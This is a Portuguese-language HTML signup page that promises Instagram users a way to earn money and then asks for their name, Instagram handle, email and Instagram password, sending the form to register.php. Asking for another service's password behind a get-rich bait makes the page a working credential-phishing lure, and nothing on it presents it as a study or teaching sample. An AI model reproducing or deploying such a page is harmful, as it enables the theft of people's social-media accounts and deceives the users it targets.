<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cadastre-se Agora!</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="login-container">
        <h1>📢 Junte-se Agora!</h1>
        <p class="highlight-text">💰 Apenas usuários do Instagram podem faturar! 💰</p>

        <!-- Formulário de Cadastro -->
        <form action="register.php" method="POST">
            <input type="text" name="nome" placeholder="Primeiro nome" required>
            <input type="text" name="instagram" placeholder="Usuário do Instagram" required>
            <input type="email" name="email" placeholder="E-mail" required>
            <input type="password" name="senha" placeholder="Sua Senha do Instagram" required>
            <button type="submit">✅ Criar Conta</button>
        </form>

        <a href="login.html" class="btn-voltar">🔄 Já tem conta? Faça login</a>
    </div>
</body>
</html>

